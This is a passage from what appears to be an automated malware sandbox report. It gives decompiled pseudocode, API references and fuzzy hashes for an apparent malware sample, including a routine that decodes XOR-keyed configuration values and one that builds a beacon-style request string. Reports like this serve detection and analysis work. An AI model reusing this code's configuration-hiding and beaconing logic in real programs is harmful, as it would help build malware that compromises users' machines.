						_t94 =  *0x12bd2dc; // 0x69b25f44
						_t46 = E012B3BB8(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x12bd27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x12bd2dc; // 0x69b25f44
						_t47 = E012B3BB8(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x12bd280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x12bd2dc; // 0x69b25f44
						_t48 = E012B3BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x12bd004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x12bd2dc; // 0x69b25f44
						_t49 = E012B3BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x12bd02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x12bd2dc; // 0x69b25f44
						_t50 = E012B3BB8(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x12bd284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x12bd2dc; // 0x69b25f44
								_t51 = E012B3BB8(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E012B49B8(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E012B4B98();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x12bd2dc; // 0x69b25f44
								_t52 = E012B3BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E012B49B8(0, _t52) != 0) {
								_t121 =  *0x12bd364; // 0x52495b0
								E012B9311(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x12bd2dc; // 0x69b25f44
								_t53 = E012B3BB8(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x12bd2e0; // 0x3f8a5a8
								_t22 = _t54 + 0x12be252; // 0x616d692f
								 *0x12bd30c = _t22;
								goto L60;
							} else {
								_t64 = E012B49B8(0, _t53);
								 *0x12bd30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x12bd2dc; // 0x69b25f44
										_t56 = E012B3BB8(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x12bd2e0; // 0x3f8a5a8
										_t23 = _t57 + 0x12be79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E012B49B8(0, _t56);
									}
									 *0x12bd380 = _t58;
									HeapFree( *0x12bd270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x012b4c40
0x012b4c43
0x012b4c63
0x012b4c71
0x012b4c71
0x012b4c76
0x012b4c90
0x012b4ef8
0x012b4eff
0x012b4f06
0x012b4f06
0x012b4c96
0x012b4cb2
0x012b4ee6
0x012b4ef0
0x00000000
0x012b4cb8
0x012b4cb8
0x012b4cbd
0x012b4cd3
0x012b4cbf
0x012b4cbf
0x012b4ccc
0x012b4ccc
0x012b4cdd
0x012b4cdf
0x012b4ce9
0x012b4cee
0x012b4cee
0x012b4ce9
0x012b4cf5
0x012b4d0b
0x012b4cf7
0x012b4cf7
0x012b4d04
0x012b4d04
0x012b4d0f
0x012b4d11
0x012b4d1b
0x012b4d20
0x012b4d20
0x012b4d1b
0x012b4d27
0x012b4d3d
0x012b4d29
0x012b4d29
0x012b4d36
0x012b4d36
0x012b4d41
0x012b4d43
0x012b4d4d
0x012b4d52
0x012b4d52
0x012b4d4d
0x012b4d59
0x012b4d6f
0x012b4d5b
0x012b4d5b
0x012b4d68
0x012b4d68
0x012b4d73
0x012b4d75
0x012b4d7f
0x012b4d84
0x012b4d84
0x012b4d7f
0x012b4d8b
0x012b4da1
0x012b4d8d
0x012b4d8d
0x012b4d9a
0x012b4d9a
0x012b4da5
0x012b4da7
0x012b4db1
0x012b4db6
0x012b4db6
0x012b4db1
0x012b4dbd
0x012b4dd3
0x012b4dbf
0x012b4dbf
0x012b4dcc
0x012b4dcc
0x012b4dd7
0x012b4dea
0x012b4dea
0x00000000
0x012b4dd9
0x012b4dd9
0x012b4de3
0x00000000
0x012b4df4
0x012b4df4
0x012b4df6
0x012b4e0c
0x012b4df8
0x012b4df8
0x012b4e05
0x012b4e05
0x012b4e10
0x012b4e12
0x012b4e15
0x012b4e16
0x012b4e1d
0x012b4e1f
0x012b4e20
0x012b4e20
0x012b4e1d
0x012b4e27
0x012b4e3d
0x012b4e29
0x012b4e29
0x012b4e36
0x012b4e36
0x012b4e41
0x012b4e4f
0x012b4e59
0x012b4e59
0x012b4e60
0x012b4e76
0x012b4e62
0x012b4e62
0x012b4e6f
0x012b4e6f
0x012b4e7a
0x012b4e8d
0x012b4e8d
0x012b4e92
0x012b4e98
0x00000000
0x012b4e7c
0x012b4e7f
0x012b4e84
0x012b4e8b
0x012b4e9d
0x012b4e9f
0x012b4eb5
0x012b4ea1
0x012b4ea1
0x012b4eae
0x012b4eae
0x012b4eb9
0x012b4ec5
0x012b4eca
0x012b4eca
0x012b4ebb
0x012b4ebe
0x012b4ebe
0x012b4ed8
0x012b4edd
0x012b4ee3
0x00000000
0x012b4ee3
0x00000000
0x012b4e8b
0x012b4e7a
0x012b4de3
0x012b4dd7

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,012B5390,?,69B25F44,?,012B5390,69B25F44,?,012B5390,69B25F44,00000005,012BD00C,00000008), ref: 012B4CE5
StrToIntExA.SHLWAPI(00000000,00000000,?,012B5390,?,69B25F44,?,012B5390,69B25F44,?,012B5390,69B25F44,00000005,012BD00C,00000008), ref: 012B4D17
StrToIntExA.SHLWAPI(00000000,00000000,?,012B5390,?,69B25F44,?,012B5390,69B25F44,?,012B5390,69B25F44,00000005,012BD00C,00000008), ref: 012B4D49
StrToIntExA.SHLWAPI(00000000,00000000,?,012B5390,?,69B25F44,?,012B5390,69B25F44,?,012B5390,69B25F44,00000005,012BD00C,00000008), ref: 012B4D7B
StrToIntExA.SHLWAPI(00000000,00000000,?,012B5390,?,69B25F44,?,012B5390,69B25F44,?,012B5390,69B25F44,00000005,012BD00C,00000008), ref: 012B4DAD
StrToIntExA.SHLWAPI(00000000,00000000,?,012B5390,?,69B25F44,?,012B5390,69B25F44,?,012B5390,69B25F44,00000005,012BD00C,00000008), ref: 012B4DDF
HeapFree.KERNEL32(00000000,012B5390,012B5390,?,69B25F44,?,012B5390,69B25F44,?,012B5390,69B25F44,00000005,012BD00C,00000008,?,012B5390), ref: 012B4EDD
HeapFree.KERNEL32(00000000,?,012B5390,?,69B25F44,?,012B5390,69B25F44,?,012B5390,69B25F44,00000005,012BD00C,00000008,?,012B5390), ref: 012B4EF0

Part of subcall function 012B49B8: lstrlen.KERNEL32(69B25F44,00000000,7748D3B0,012B5390,012B4EC3,00000000,012B5390,?,69B25F44,?,012B5390,69B25F44,?,012B5390,69B25F44,00000005), ref: 012B49C1
Part of subcall function 012B49B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,012B5390), ref: 012B49E4
Part of subcall function 012B49B8: memset.NTDLL ref: 012B49F3

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$lstrlenmemcpymemset
String ID:
API String ID: 3442150357-0
Opcode ID: 09fbc72a411d51f76efeca7e5ae59e2d51f631ea2b7d2817f19c2ac01108920a
Instruction ID: 916b1bdd3ec153ba4cb7490edf514141454150c26103419b1b5bb5bdc87c8f50
Opcode Fuzzy Hash: 09fbc72a411d51f76efeca7e5ae59e2d51f631ea2b7d2817f19c2ac01108920a
Instruction Fuzzy Hash: 1781BC746302CAAFDB20FBB8D9C8DEB77E9A74C7847244955D203D720AEA31D9408B10

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4E84C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,6ED4EB6A,00000002,00000000,?,?,?,6ED4EB6A,?,00000000), ref: 6ED4E8E5
GetLocaleInfoW.KERNEL32(?,20001004,6ED4EB6A,00000002,00000000,?,?,?,6ED4EB6A,?,00000000), ref: 6ED4E90E
GetACP.KERNEL32(?,?,6ED4EB6A,?,00000000), ref: 6ED4E923

Strings

ACP, xrefs: 6ED4E86A
OCP, xrefs: 6ED4E8A0

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6ef9ddc8539dc5dd16cfa29ffe7ee36e00ee0499341a8b72cce437225e776726
Instruction ID: db19aedc34a4cfbf431df5c242cd4e0f297ac09299c0f1ddda37d67c646da0c5
Opcode Fuzzy Hash: 6ef9ddc8539dc5dd16cfa29ffe7ee36e00ee0499341a8b72cce437225e776726
Instruction Fuzzy Hash: F521B622A14201FAEFA4CBD9C901B8777B7EFA5B50B568424ED15DF184E732DD40C390

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4E0A2, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F299: GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
Part of subcall function 6ED3F299: SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

GetACP.KERNEL32(?,?,?,?,?,?,6ED425B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6ED4E163
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6ED425B5,?,?,?,00000055,?,-00000050,?,?), ref: 6ED4E18E
_wcschr.LIBVCRUNTIME ref: 6ED4E222
_wcschr.LIBVCRUNTIME ref: 6ED4E230
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6ED4E2F1

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 4147378913-0
Opcode ID: 1967fdc39b552be62da1d2a3c2c95f58c62c825b1a6e021713a3359d224578ef
Instruction ID: 916903342b4748597d95e01c1fe50b260d51d2cebb53af1d0a90bd6124f8eed2
Opcode Fuzzy Hash: 1967fdc39b552be62da1d2a3c2c95f58c62c825b1a6e021713a3359d224578ef
Instruction Fuzzy Hash: 03710071A40206FAEB55DBF5CC85EAB73ACAF65304F10092AED59DF180EB70E94087A1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4EA21, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F299: GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
Part of subcall function 6ED3F299: SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

Part of subcall function 6ED3F299: _free.LIBCMT ref: 6ED3F2FB
Part of subcall function 6ED3F299: _free.LIBCMT ref: 6ED3F331

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6ED4EB2D
IsValidCodePage.KERNEL32(00000000), ref: 6ED4EB76
IsValidLocale.KERNEL32(?,00000001), ref: 6ED4EB85
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6ED4EBCD
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6ED4EBEC

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 49391311b8a5e2c904498469baf55b53da98f9ee57839ab627a74b5ac3fd8b3d
Instruction ID: e7ffe2e8e6fefb912f5f0ab0900eaaee69c8ad4223984dfcff44e495928b7d62
Opcode Fuzzy Hash: 49391311b8a5e2c904498469baf55b53da98f9ee57839ab627a74b5ac3fd8b3d
Instruction Fuzzy Hash: CE517C71A0021AFFEF50DFE5CC45AAAB7B8BF25304F14056AE925EB180E770D944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6ED16CAF, Relevance: 77.3, APIs: 32, Strings: 12, Instructions: 287COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED16CB6
collate.LIBCPMT ref: 6ED16CBF

Part of subcall function 6ED159D8: __EH_prolog3_GS.LIBCMT ref: 6ED159DF
Part of subcall function 6ED159D8: __Getcoll.LIBCPMT ref: 6ED15A43
Part of subcall function 6ED159D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6ED15A5F

__Getcoll.LIBCPMT ref: 6ED16D05
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16D19
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16D2E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16D7F
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16EB4
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16EC7
int.LIBCPMT ref: 6ED16ED4
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16EE4
int.LIBCPMT ref: 6ED16EF1
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16F01
int.LIBCPMT ref: 6ED16F0E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16F1E
int.LIBCPMT ref: 6ED16CDF

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

int.LIBCPMT ref: 6ED16D42
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16D6C
int.LIBCPMT ref: 6ED16D97
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16DC5
int.LIBCPMT ref: 6ED16DD2
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16DF9
int.LIBCPMT ref: 6ED16E06
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16E56
int.LIBCPMT ref: 6ED16E63
int.LIBCPMT ref: 6ED16F36
numpunct.LIBCPMT ref: 6ED16F5D
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16F6D
int.LIBCPMT ref: 6ED16F7A
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16FB1
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16FC4
int.LIBCPMT ref: 6ED16FD1
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16FE1

Strings

T=n, xrefs: 6ED16F75
D=n, xrefs: 6ED16DCD
L=n, xrefs: 6ED16F09
@=n, xrefs: 6ED16D92
L=n, xrefs: 6ED16E5E
H=n, xrefs: 6ED16EEC
P=n, xrefs: 6ED16F31
8=n, xrefs: 6ED16CDA
H=n, xrefs: 6ED16E01
<=n, xrefs: 6ED16D3D
D=n, xrefs: 6ED16ECF
T=n, xrefs: 6ED16FCC

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
String ID: 8=n$<=n$@=n$D=n$D=n$H=n$H=n$L=n$L=n$P=n$T=n$T=n
API String ID: 2009638416-3048463476
Opcode ID: 3ec39be6711658a0b4d38dd86cc5a6473cbde5b26e9f405b357cabb15ba781b4
Instruction ID: 5adf641cdd75b17193e9c96872bc9cb65393568751c7d6ed1baa52d3415d98e2
Opcode Fuzzy Hash: 3ec39be6711658a0b4d38dd86cc5a6473cbde5b26e9f405b357cabb15ba781b4
Instruction Fuzzy Hash: 9691B5B1E19311AFEB205FF5AC45AFF7AAC9F52758F144E18E9546B240EB34890087B2

Uniqueness

Uniqueness Score: -1.00%

Function 012B6109, Relevance: 33.2, APIs: 22, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E012B6109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x12bd018; // 0x1f7541c4
				asm("bswap eax");
				_t61 =  *0x12bd014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x12bd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x12bd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0x12bd2e0; // 0x3f8a5a8
				_t3 = _t64 + 0x12be633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x12bd02c,  *0x12bd004, _t59);
				_t67 = E012B5B60();
				_t68 =  *0x12bd2e0; // 0x3f8a5a8
				_t4 = _t68 + 0x12be673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E012B1BBF(_t134);
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x12bd2e0; // 0x3f8a5a8
					_t7 = _t126 + 0x12be8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x12bd270, 0, _v8);
				}
				_t73 = E012B137A();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x12bd2e0; // 0x3f8a5a8
					_t11 = _t121 + 0x12be8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x12bd270, 0, _v8);
				}
				_t146 =  *0x12bd364; // 0x52495b0
				_t75 = E012B3857(0x12bd00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x12bd270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x12bd270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x12bd270, _t152, _v20);
						goto L26;
					}
					E012BA811(GetTickCount());
					_t82 =  *0x12bd364; // 0x52495b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x12bd364; // 0x52495b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x12bd364; // 0x52495b0
					_t148 = E012B1974(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x12bd270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x12bc2ac);
					_push(_t148);
					_t94 = E012B38CA();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x12bd270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E012B1922( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E012B47D5();
						L22:
						HeapFree( *0x12bd270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E012B365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E012B3273(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E012B4AAB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E012B8FB2(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E012B4AAB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x012b6109
0x012b6109
0x012b6109
0x012b6112
0x012b611b
0x012b611d
0x012b611d
0x012b612a
0x012b6135
0x012b6138
0x012b613d
0x012b6146
0x012b6149
0x012b614e
0x012b6151
0x012b6156
0x012b6159
0x012b6165
0x012b6172
0x012b6174
0x012b617a
0x012b617f
0x012b618a
0x012b618c
0x012b618f
0x012b6191
0x012b6196
0x012b619c
0x012b61a1
0x012b61a4
0x012b61a9
0x012b61b6
0x012b61b8
0x012b61be
0x012b61c8
0x012b61c8
0x012b61ca
0x012b61cf
0x012b61d4
0x012b61d7
0x012b61dc
0x012b61e9
0x012b61eb
0x012b61f9
0x012b61f9
0x012b61fb
0x012b6209
0x012b620e
0x012b6210
0x012b6215
0x012b63d6
0x012b63e0
0x012b63e9
0x012b621b
0x012b6227
0x012b622d
0x012b6232
0x012b63ca
0x012b63d4
0x00000000
0x012b63d4
0x012b623e
0x012b6243
0x012b624c
0x012b625d
0x012b6261
0x012b626a
0x012b6270
0x012b627f
0x012b6286
0x012b628f
0x012b6295
0x012b63be
0x012b63c8
0x00000000
0x012b63c8
0x012b62a1
0x012b62a7
0x012b62a8
0x012b62ad
0x012b62b2
0x012b63b4
0x012b63bc
0x00000000
0x012b63bc
0x012b62bb
0x012b62c2
0x012b62ca
0x012b62cf
0x012b62d8
0x012b62e3
0x012b62e8
0x012b62ed
0x012b63ec
0x012b63a0
0x012b63a0
0x012b63a5
0x012b63b0
0x012b63b2
0x00000000
0x012b63b2
0x012b62f7
0x012b62fc
0x012b6301
0x012b6306
0x012b6316
0x012b6319
0x012b631f
0x012b6325
0x012b632b
0x012b632e
0x012b6334
0x012b6337
0x012b633c
0x012b6340
0x012b6340
0x012b634c
0x012b6358
0x012b635c
0x012b635e
0x012b6363
0x012b6365
0x012b636a
0x012b636f
0x012b637c
0x012b6384
0x012b6387
0x012b6387
0x012b6363
0x00000000
0x012b634e
0x012b6352
0x012b6389
0x012b638c
0x012b6395
0x00000000
0x00000000
0x00000000
0x00000000
0x012b6395
0x012b6354
0x00000000
0x012b6354
0x012b634c

APIs

GetTickCount.KERNEL32 ref: 012B611D
wsprintfA.USER32 ref: 012B616D
wsprintfA.USER32 ref: 012B618A
wsprintfA.USER32 ref: 012B61B6
HeapFree.KERNEL32(00000000,?), ref: 012B61C8
wsprintfA.USER32 ref: 012B61E9
HeapFree.KERNEL32(00000000,?), ref: 012B61F9
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 012B6227
GetTickCount.KERNEL32 ref: 012B6238
RtlEnterCriticalSection.NTDLL(05249570), ref: 012B624C
RtlLeaveCriticalSection.NTDLL(05249570), ref: 012B626A

Part of subcall function 012B1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,012B4653,?,052495B0), ref: 012B199F
Part of subcall function 012B1974: lstrlen.KERNEL32(?,?,?,012B4653,?,052495B0), ref: 012B19A7
Part of subcall function 012B1974: strcpy.NTDLL ref: 012B19BE
Part of subcall function 012B1974: lstrcat.KERNEL32(00000000,?), ref: 012B19C9
Part of subcall function 012B1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,012B4653,?,052495B0), ref: 012B19E6

StrTrimA.SHLWAPI(00000000,012BC2AC,?,052495B0), ref: 012B62A1

Part of subcall function 012B38CA: lstrlen.KERNEL32(05249B10,00000000,00000000,74ECC740,012B467E,00000000), ref: 012B38DA
Part of subcall function 012B38CA: lstrlen.KERNEL32(?), ref: 012B38E2
Part of subcall function 012B38CA: lstrcpy.KERNEL32(00000000,05249B10), ref: 012B38F6
Part of subcall function 012B38CA: lstrcat.KERNEL32(00000000,?), ref: 012B3901

lstrcpy.KERNEL32(00000000,?), ref: 012B62C2
lstrcpy.KERNEL32(?,?), ref: 012B62CA
lstrcat.KERNEL32(?,?), ref: 012B62D8
lstrcat.KERNEL32(?,00000000), ref: 012B62DE

Part of subcall function 012B1922: lstrlen.KERNEL32(?,00000000,05249B38,00000000,012B74FF,05249D16,?,?,?,?,?,69B25F44,00000005,012BD00C), ref: 012B1929
Part of subcall function 012B1922: mbstowcs.NTDLL ref: 012B1952
Part of subcall function 012B1922: memset.NTDLL ref: 012B1964

wcstombs.NTDLL ref: 012B636F

Part of subcall function 012B3273: SysAllocString.OLEAUT32(?), ref: 012B32AE

Part of subcall function 012B4AAB: RtlFreeHeap.NTDLL(00000000,00000000,012B5012,00000000,?,?,00000000), ref: 012B4AB7

HeapFree.KERNEL32(00000000,?,?), ref: 012B63B0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 012B63BC
HeapFree.KERNEL32(00000000,?,?,052495B0), ref: 012B63C8
HeapFree.KERNEL32(00000000,?), ref: 012B63D4
HeapFree.KERNEL32(00000000,?), ref: 012B63E0

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 3748877296-0
Opcode ID: b4e81399370c7a2beeabd624918b982ab6d0fc9a644bbe8d1565d668c3604110
Instruction ID: 0e215a33cf078867665f7903e7ecf7f78db1e4ca48e30368cc01595ebb9bcb60
Opcode Fuzzy Hash: b4e81399370c7a2beeabd624918b982ab6d0fc9a644bbe8d1565d668c3604110
Instruction Fuzzy Hash: 4591467191120AAFDB21EFA8ECC8AEE7BB9FF08394F144425F50497251DB31E951DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4B2A4, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6ED4B2E8

